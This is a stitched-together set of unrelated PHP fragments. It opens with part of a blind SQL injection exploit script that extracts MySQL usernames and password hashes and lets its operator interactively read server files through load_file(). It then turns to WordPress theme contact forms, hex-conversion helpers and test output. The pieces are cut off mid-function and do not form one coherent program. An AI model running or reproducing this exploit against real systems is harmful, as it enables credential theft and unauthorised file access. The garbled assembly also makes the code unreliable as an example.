$msg = "\n(+) MySQL user:pass -> ";
$sqli = "'+and+ascii(substring((sElEcT+cOncAt(";
$sqli .= "user,0x3a,password)+from+mysql.user+";
getlogindetails($p, $msg, $sqli);
$loadsqli = "'+and+!isnull(loAd_fIle(0x2F6574632F706173737764))--+";
if (checksqli($loadsqli, $p)) {
echo "\n(!) Access to load_file(), wanna play? (y/n): ";
$resp = trim(read());
if (strcmp($resp, "y") === 0) {
$loadfile = "";
while (strcmp($loadfile, "q") != 0) {
echo "\n(+) Please enter the file (q to quit): ";
$loadfile = trim(read());
if (strcmp($loadfile, "q") === 0) {
break;
}
$loadsqli = "'+and+!isnull(loAd_fIle(0x" . strhex($loadfile) . "))--+";
if (checksqli($loadsqli, $p)) {
$sqli = "'+and+ascii(substring(load_file(0x" . strhex($loadfile);
$msg = "(!) Dumping the " . $loadfile . " file, hold onto your knickers!\n";
getlogindetails($p, $msg, $sqli);
} else {
echo "(-) File doesn't exist/no access.";
}
}
} else {
echo "(-) Ok Exiting..\n";
die;
}
}
}
<p id="badserver" class="errormsg" style="display:none;">Your email failed. Try again later.</p>
<form id="contact" action="<?php
bloginfo('template_url');
?>
/sendmail.php" method="post">
<label for="name">Your name: *</label>
<input type="text" id="nameinput" name="name" value=""/>
<label for="email">Your email: *</label>
<input type="text" id="emailinput" name="email" value=""/>
<label for="comment">Your message: *</label>
<textarea cols="20" rows="7" id="commentinput" name="comment"></textarea><br />
<input type="submit" id="submitinput" name="submit" class="submit" value="SEND MESSAGE"/>
<input type="hidden" id="receiver" name="receiver" value="<?php
echo strhex(get_option('boldy_contact_email'));
?>
"/>
</form>
</div>
<!-- end colleft -->
<?php
get_sidebar();
?>
<?php
get_footer();
?>
function init($string)
{
$len = strlen($string) * 8;
$hex = strhex($string);
// convert ascii string to hex
$bin = leftpad(hexbin($hex), $len);
// convert hex string to bin
$padded = pad($bin);
$padded = pad($padded, 1, $len);
$block = str_split($padded, 32);
foreach ($block as &$b) {
$b = implode('', array_reverse(str_split($b, 8)));
}
return $block;
}
function hexstr($hexstr)
{
$hexstr = str_replace(' ', '', $hexstr);
$hexstr = str_replace('\\x', '', $hexstr);
$retstr = pack('H*', $hexstr);
return $retstr;
}
function strhex($string)
{
$hexstr = unpack('H*', $string);
return array_shift($hexstr);
}
$teststr = "64 65 74 61 69 6c 73";
#$teststr = "01 02 63 00 39 00 45 00 36 00 43 00 32 00 30 00 41 00 30 00 00 00";
ini_set('display_errors', 1);
error_reporting(E_ALL);
$ascii_inputs = array("details", "abcde");
$hex_inputs = array("64 65 74 61 69 6c 73", "64657461696c73", '\\x64\\x65\\x74\\x61\\x69\\x6c\\x73');
print "<pre>";
foreach ($ascii_inputs as $str) {
$str2 = strhex($str);
//printf("strhex('%s') = %s [%s]\n", $str, var_export($str2, true), implode(" ", str_split($str2, 2)));
echo $str2;
}
foreach ($hex_inputs as $str) {
$str2 = hexstr($str);
//printf("hexstr('%s') = %s\n", $str, var_export($str2, true));
}
print "</pre><hr>\n";
//show_source(__FILE__);
$in = "1fv";
echo "strhex(", $in, ") = ", strhex($in), "<BR>";
$in = "1qf";
echo "strhex(", $in, ") = ", strhex($in), "<BR>";
$in = "1fq";
echo "strhex(", $in, ") = ", strhex($in), "<BR>";
$in = "qff";
echo "strhex(", $in, ") = ", strhex($in), "<BR>";
$in = "";
echo "strhex(", $in, ") = ", strhex($in), "<BR>";
$in = "FFFF";
echo "strhex(", $in, ") = ", strhex($in), "<BR>";
$in = "{$in}{$in}";
echo "strhex(", $in, ") = ", strhex($in), "<BR>";
$in = "{$in}{$in}";
echo "strhex(", $in, ") = ", strhex($in), "<BR>";
echo "<BR>";
/**********************************************************/
echo "*******************************<BR>";
echo "strbin(\$string) : <BR>";
echo "*******************************<BR>";
/**********************************************************/
$in = "10000000";
echo "strbin(", $in, ") = ", strbin($in), "<BR>";
$in = "100000v0";
echo "strbin(", $in, ") = ", strbin($in), "<BR>";
$in = "100000w0";
echo "strbin(", $in, ") = ", strbin($in), "<BR>";
$in = "100001w0";
echo "strbin(", $in, ") = ", strbin($in), "<BR>";
$in = "";
<p id="badserver" class="errormsg" style="display:none;">Your email failed. Try again later.</p>
<form id="contact" action="<?php
bloginfo('template_url');
?>
/sendmail.php" method="post">
<label for="nameinput">Your name: *</label>
<input type="text" id="nameinput" name="name" value=""/>
<label for="emailinput">Your email: *</label>
<input type="text" id="emailinput" name="email" value=""/>
<label for="commentinput">Your message: *</label>
<textarea cols="20" rows="7" id="commentinput" name="comment"></textarea><br />
<input type="submit" id="submit" name="submit" class="submit" value="SEND MESSAGE"/>
<input type="hidden" id="receiver" name="receiver" value="<?php
echo strhex(get_option('diary_contact_email'));
?>
"/>
</form>
</section>
<div class="sidebadge"></div>
</article>
</section>
<!-- End Main Content ( left col ) -->
<?php
get_sidebar();
get_footer();
?>
_e('Your email failed. Try again later.', 'hm');
?>
</p>
<form id="contact" action="<?php
echo get_template_directory_uri();
?>
/inc/sendmail.php" method="post">
<label>Your name: *</label>
<input type="text" id="nameinput" name="name" value=""/>
<label>Your email: *</label>
<input type="text" id="emailinput" name="email" value=""/>
<label>Your message: *</label>
<textarea cols="20" rows="7" id="commentinput" name="comment"></textarea>
<input type="submit" id="send_message" name="submit" class="submit" value="SEND MESSAGE"/>
<input type="hidden" id="receiver" name="receiver" value="<?php
echo strhex(of_get_option('contact_form_email'));
?>
"/>
</form>
</div>
</div>
<!--END .post_detail-->
<?php
}
?>
<?php
}
?>
<script type="text/javascript">
